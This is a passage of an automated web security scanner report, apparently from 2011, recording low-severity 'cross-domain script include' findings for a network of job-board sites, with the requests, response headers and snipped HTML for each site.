<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.404. http://www.publicinterestcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.publicinterestcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d0md3kboqphlouu186urplhea4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104328

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.405. http://www.publishingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.publishingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hjafrla8sm0vjpuuvbsqohvh76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114373

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.406. http://www.purchasingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.purchasingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jp7jhr7hfsn4u1q0tf9pujn7l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105391

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.407. http://www.qaqccrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.qaqccrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2cvnjstpd6ib3smaikg60ai1v0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120361

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.408. http://www.radiocrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.radiocrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=beoah5h5h42a821e8g7r1l0ko5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113112

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.409. http://www.realestateandlandcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realestateandlandcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:57 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=om23b647f73v2jeihjo6qjanv4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.410. http://www.recruitingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.recruitingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rtub18ulrc3vam4sd88gmoelh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.411. http://www.researchingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.researchingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=14bsqa9jfj35kburppunl56pe1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.412. http://www.retailcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.retailcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0f8bbnd9tsuoh4h0j5d47on745; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105722

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
